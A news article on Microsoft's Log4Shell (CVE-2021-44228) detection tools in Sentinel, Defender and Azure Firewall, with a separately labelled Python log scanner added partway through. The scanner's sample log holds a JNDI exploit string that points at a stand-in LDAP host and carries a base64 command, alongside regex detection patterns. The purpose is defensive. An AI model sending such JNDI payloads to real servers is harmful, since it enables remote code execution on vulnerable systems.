Microsoft Sentinel Gets Log4j Exploit Detector Preview

Microsoft added a preview solution in Microsoft Sentinel that helps IT pros find signs of Log4j exploits, according to a Thursday announcement and Twitter post.

The Log4j exploit detection preview solution is available through Microsoft Sentinel's Content Hub. Oddly, organizations with Microsoft Sentinel subscriptions from Microsoft Azure Cloud Solution Provider partners have to manually install this preview, if wanted, per comments in the announcement.

"Solutions can't be deployed into subscriptions from Microsoft Azure Cloud Solution Providers," commented Sarah Young of Microsoft. "However, you can manually add these detections into your workspace from our GitHub repo."

Microsoft has been keeping users of its security solutions apprised of updated tools for dealing with potential Log4j exploits in this Dec. 11 announcement, which has undergone a few revisions. It was recently updated to include the new details about the Microsoft Sentinel preview solution, for instance.

Log4j is an open source Java logging library that is widely used in multiple applications (see CISA's list). It's currently under widespread attack because of a security hole dubbed "Log4Shell" (CVE-2021-44228) that can enable remote code execution.

One of the earliest discovered attack vectors for the Log4j vulnerability was Microsoft's Minecraft game, as hosted on servers maintained by non-Microsoft users. Microsoft is encouraging those maintainers to install the latest update to the game.

Microsoft Defender for Endpoint for Detecting Attacks
Microsoft Defender for Endpoint users should check for "signs of post-exploitation, rather than fully relying on prevention" measures, the Dec. 11 announcement indicated:

Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.

Cloud Protections Using Microsoft Defender Antivirus
Microsoft advised Microsoft Defender Antivirus users to "turn on cloud-delivered protection," which will "cover rapidly evolving attacker tools and techniques."

Microsoft 365 Defender Blindspots
Microsoft 365 Defender may not find all vulnerable Log4j Java ARchive (JAR) files, plus Linux and macOS support is yet to come, the Dec. 11 announcement admitted:

As of this writing (12/16/2021), discoverability [in Microsoft 365 Defender] is based on the presence of vulnerable Log4j Java ARchive (JAR) files on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but coverage for these instances and other packaging methods is in-progress. Support for Linux and macOS is also in-progress and will roll out soon.

Microsoft is currently rolling out Microsoft Defender for Endpoint updates to "surface vulnerable Log4j library components," which will enable it to "automatically discover" the vulnerabilities.

Security Center Alerts
Microsoft's Security Center portal will show alerts on threat activity associated with Log4j exploits for both Linux and Windows systems.

Security Center will show alerts when it detects traffic associated with exploitation of the CVE-2021-44228 vulnerability. It'll detect Cobalt Strike command and control installs, plus other shells, backdoors and coin miners. The Security Center portal also will show activations of suspicious commands and scripts.

Azure Firewall Premium Users Protected
Azure Firewall Premium subscribers "have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit," Microsoft's Dec. 11 announcement indicated.

This protection doesn't appear to be afforded to Azure Firewall Standard users. The announcement advised Standard users to upgrade to the Premium product.

Mass Scanning Activities
Microsoft has been detecting mass scanning for the Log4j vulnerability. The Mirai botnet is targeting Elasticsearch systems to deploy cryptocurrency miners. The vulnerability is also being used to install Tsunami backdoors on Linux systems, Microsoft indicated.

"Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows," the Dec. 11 announcement indicated.
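As an added example (not code from the article, from Microsoft Sentinel, or from the MSTIC repository), the following Python scanner applies the pattern described in that quote to constructed web-server access log lines: it flags JNDI lookup strings and decodes any base64 segment that follows a `Base64/` path component so an analyst can review the embedded command. The log lines, hostname and the `Base64/` path layout are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass, field

# Constructed sample access log lines (not real traffic). The second line carries a
# JNDI lookup in the User-Agent field with a base64-encoded command segment.
SAMPLE_LOGS = [
    '10.0.0.5 - - [16/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://example.invalid:1389/Basic/Command/Base64/ZWNobyBoZWxsbw==}"',
    '10.0.0.7 - - [16/Dec/2021:10:00:03 +0000] "GET /status HTTP/1.1" 200 64 "-" "curl/7.79"',
]

# A JNDI lookup: capture the scheme and the remainder of the URL up to the closing brace.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^}\s]+)\}", re.IGNORECASE)
# Assumed layout: the base64 command follows a "Base64/" path component in the URL.
B64_RE = re.compile(r"Base64/([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int          # 1-based index of the offending log line
    scheme: str           # ldap, ldaps, rmi or dns
    target: str           # host:port/path portion of the lookup
    decoded: list = field(default_factory=list)  # decoded base64 segments, for analyst review


def decode_b64_segments(url: str) -> list:
    """Decode every Base64/<data> segment in the lookup URL; mark undecodable ones."""
    out = []
    for seg in B64_RE.findall(url):
        try:
            out.append(base64.b64decode(seg, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            out.append("<undecodable>")
    return out


def scan_logs(lines) -> list:
    """Return one Finding per JNDI lookup found in the given log lines."""
    findings = []
    for i, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            findings.append(Finding(i, m.group(1).lower(), m.group(2),
                                    decode_b64_segments(m.group(2))))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.scheme} lookup -> {f.target}; decoded={f.decoded}")
```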

Microsoft is also observing nation-state activity from "groups originating from China, Iran, North Korea and Turkey" using the vulnerability.

The Microsoft Threat Intelligence Center (MSTIC) is keeping a list of indicators of compromise associated with the Log4j vulnerability. The raw list is located at this GitHub page.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.
